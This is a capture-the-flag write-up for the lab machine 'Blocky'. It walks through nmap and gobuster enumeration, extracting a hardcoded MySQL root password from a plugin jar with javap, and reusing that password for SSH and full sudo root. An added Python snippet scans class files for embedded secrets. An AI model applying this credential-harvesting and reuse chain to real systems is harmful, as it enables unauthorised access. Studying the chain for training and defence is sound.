# Blocky

### Initial enumeration

```bash
# Nmap 7.80 scan initiated Sat Sep 28 23:30:25 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 22,21,80,25565 10.10.10.37
Nmap scan report for 10.10.10.37
Host is up (0.23s latency).

PORT      STATE SERVICE   VERSION
21/tcp    open  ftp       ProFTPD 1.3.5a
22/tcp    open  ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp    open  http      Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft &#8211; Under Construction!
25565/tcp open  minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.4 (92%), Linux 4.8 (92%), Linux 3.16 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   240.30 ms 10.10.14.1
2   240.22 ms 10.10.10.37

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 28 23:30:49 2019 -- 1 IP address (1 host up) scanned in 25.06 seconds
```

The web server on port 80 runs a default WordPress installation with nothing interesting on the front page, so I ran `gobuster`.

```bash
/wiki (Status: 301)
/wp-content (Status: 301)
/index.php (Status: 301)
/wp-login.php (Status: 200)
/plugins (Status: 301)
/license.txt (Status: 200)
/wp-includes (Status: 301)
/javascript (Status: 301)
/wp-trackback.php (Status: 200)
/wp-admin (Status: 301)
/phpmyadmin (Status: 301)
/wp-signup.php (Status: 302)
/server-status (Status: 403)
```

`/wiki` and `/plugins` seemed interesting. The wiki had nothing but a note, but `/plugins` held two jar files.

![](/files/-Lq1FRAtbCaQEs9-drsW)

`BlockyCore.jar` seemed interesting, so I extracted its contents (a jar is just a zip archive).

```bash
$ unzip BlockyCore.jar -d output
$ ls -laR ./output
.:
total 16
drwxr-xr-x 4 jtnydv jtnydv 4096 Sep 30 18:31 .
drwxr-xr-x 5 jtnydv jtnydv 4096 Sep 30 18:31 ..
drwxr-xr-x 3 jtnydv jtnydv 4096 Sep 30 18:31 com
drwxr-xr-x 2 jtnydv jtnydv 4096 Sep 30 18:31 META-INF

./com:
total 12
drwxr-xr-x 3 jtnydv jtnydv 4096 Sep 30 18:31 .
drwxr-xr-x 4 jtnydv jtnydv 4096 Sep 30 18:31 ..
drwxr-xr-x 2 jtnydv jtnydv 4096 Sep 30 18:31 myfirstplugin

./com/myfirstplugin:
total 12
drwxr-xr-x 2 jtnydv jtnydv 4096 Sep 30 18:31 .
drwxr-xr-x 3 jtnydv jtnydv 4096 Sep 30 18:31 ..
-rw-r--r-- 1 jtnydv jtnydv  939 Jul  2  2017 BlockyCore.class

./META-INF:
total 12
drwxr-xr-x 2 jtnydv jtnydv 4096 Sep 30 18:31 .
drwxr-xr-x 4 jtnydv jtnydv 4096 Sep 30 18:31 ..
-rw-r--r-- 1 jtnydv jtnydv   25 Jul  2  2017 MANIFEST.MF
```

`BlockyCore.class` seemed like the only interesting file in the folders, so I disassembled it with `javap` to get something readable.

```bash
$ javap -c BlockyCore.class
--- SNIP ---
public com.myfirstplugin.BlockyCore();
    Code:
       0: aload_0
       1: invokespecial #12                 // Method java/lang/Object."<init>":()V
       4: aload_0
       5: ldc           #14                 // String localhost
       7: putfield      #16                 // Field sqlHost:Ljava/lang/String;
      10: aload_0
      11: ldc           #18                 // String root
      13: putfield      #20                 // Field sqlUser:Ljava/lang/String;
      16: aload_0
      17: ldc           #22                 // String 8YsqfCTnvxAUeduzjNSXe22
      19: putfield      #24                 // Field sqlPass:Ljava/lang/String;
      22: return
--- SNIP ---
```

We got credentials for the `mysql` server: `root:8YsqfCTnvxAUeduzjNSXe22`. These credentials got me into the `phpmyadmin` interface on the server and let me fetch the username `notch` from the `wp_users` table.
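The password was only sitting in the constant pool of a class file inside a publicly served jar, which is exactly what `javap` printed above. As an added example (my own, not from the write-up), the following walks a JVM class file's constant pool, pulls out every `CONSTANT_Utf8` string, and flags credential-looking field names and long random literals, so a plugins directory can be checked before it is published. The sample class bytes are constructed inline to mirror BlockyCore's pool; `scan_jar` is a hypothetical helper for running the same check over real jars.

```python
import re
import struct
import zipfile

# Constant-pool tags other than Utf8 (tag 1) have a fixed payload size in bytes.
FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
         15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}

def constant_pool_strings(data):
    """Walk the class-file constant pool and return every CONSTANT_Utf8 value."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a class file")
    count = struct.unpack(">H", data[8:10])[0]   # constant_pool_count (entries + 1)
    pos, idx, out = 10, 1, []
    while idx < count:
        tag = data[pos]
        pos += 1
        if tag == 1:  # CONSTANT_Utf8: u2 length followed by modified-UTF-8 bytes
            n = struct.unpack(">H", data[pos:pos + 2])[0]
            out.append(data[pos + 2:pos + 2 + n].decode("utf-8", "replace"))
            pos += 2 + n
        else:
            pos += FIXED[tag]
        idx += 2 if tag in (5, 6) else 1  # Long and Double occupy two pool slots
    return out

SECRET_NAME = re.compile(r"pass|pwd|secret|token|apikey", re.I)

def find_secrets(strings):
    """Return (suspicious field names, long mixed-case alphanumeric literals)."""
    names = [s for s in strings if SECRET_NAME.search(s) and re.fullmatch(r"\w+", s)]
    literals = [s for s in strings if re.fullmatch(r"[A-Za-z0-9]{16,}", s)
                and re.search(r"[a-z]", s) and re.search(r"[A-Z0-9]", s)]
    return names, literals

def scan_jar(path):
    """Hypothetical helper: yield (class name, findings) for every class in a jar."""
    with zipfile.ZipFile(path) as jar:
        for name in jar.namelist():
            if name.endswith(".class"):
                yield name, find_secrets(constant_pool_strings(jar.read(name)))

def build_sample_class():
    """Constructed sample: a minimal pool shaped like BlockyCore's, not the real jar."""
    entries = [("utf8", "com/myfirstplugin/BlockyCore"), ("class", 1), ("utf8", "sqlPass"),
               ("utf8", "8YsqfCTnvxAUeduzjNSXe22"), ("string", 4), ("utf8", "Ljava/lang/String;")]
    pool = b""
    for kind, val in entries:
        if kind == "utf8":
            raw = val.encode()
            pool += b"\x01" + struct.pack(">H", len(raw)) + raw
        else:  # class (tag 7) and string (tag 8) both hold a u2 index into the pool
            pool += (b"\x07" if kind == "class" else b"\x08") + struct.pack(">H", val)
    return b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 52, len(entries) + 1) + pool
```

The parser stops after the constant pool, so it does not need the rest of the class file; that is also why it works on the truncated sample above.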

![](/files/-Lq1GfNzRnpOeuiDiZYR)

I tried cracking the user's password hash, but it was not in the `rockyou.txt` wordlist, so I let it be and continued with the username and password I already had, trying them against the SSH server.

```bash
$ ssh root@10.10.10.37
root@10.10.10.37's password: 
Permission denied, please try again.
root@10.10.10.37's password: 
# Password combination didn't work for root, however it did
# work for notch

$ ssh notch@10.10.10.37
notch@10.10.10.37's password: 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.


Last login: Mon Sep 30 07:40:07 2019 from 10.10.14.10
notch@Blocky:~$ id
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
notch@Blocky:~$ 
```

### User own

```bash
notch@Blocky:~$ cat /home/notch/user.txt; echo
59fee***
notch@Blocky:~$ 
```

### Root own

I noticed that we had the password for the account and that it was a member of the `sudo` group, so I went ahead and checked what permissions we had in `sudoers`.

```bash
notch@Blocky:~$ sudo -l
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL
```

So we are effectively root: we can run ALL commands, as ALL users (and groups), on ALL hosts. This is game over.

```bash
notch@Blocky:~$ sudo cat /root/root.txt; echo
0a969***
notch@Blocky:~$ 
```

### Learning outcome

Thorough enumeration is the key when exploiting machines; I had nearly missed trying the user `notch` with the password recovered for `root`. Keeping track of every username and password you find is important while pen-testing.
